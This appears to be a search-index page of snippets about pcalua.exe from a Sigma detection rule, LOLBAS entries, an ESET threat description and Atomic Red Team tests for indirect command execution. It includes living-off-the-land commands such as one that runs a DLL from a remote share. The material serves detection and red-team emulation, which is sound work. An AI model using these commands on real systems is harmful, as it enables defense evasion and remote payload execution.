sigma |
proc_creation_win_indirect_cmd.yml |
description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). |
DRL 1.0 |
sigma |
proc_creation_win_indirect_cmd.yml |
- '\pcalua.exe' |
DRL 1.0 |
LOLBAS |
Pcalua.yml |
Name: Pcalua.exe |
|
LOLBAS |
Pcalua.yml |
- Command: pcalua.exe -a calc.exe |
|
LOLBAS |
Pcalua.yml |
- Command: pcalua.exe -a \\server\payload.dll |
|
LOLBAS |
Pcalua.yml |
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java |
|
LOLBAS |
Pcalua.yml |
- Path: C:\Windows\System32\pcalua.exe |
|
malware-ioc |
misp_invisimole.json |
"description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", |
© ESET 2014-2018 |
atomic-red-team |
index.md |
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
windows-index.md |
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
<blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
- Atomic Test #1 - Indirect Command Execution - pcalua.exe |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
## Atomic Test #1 - Indirect Command Execution - pcalua.exe |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
pcalua.exe -a #{process} |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
pcalua.exe -a #{payload_path} |
MIT License. © 2018 Red Canary |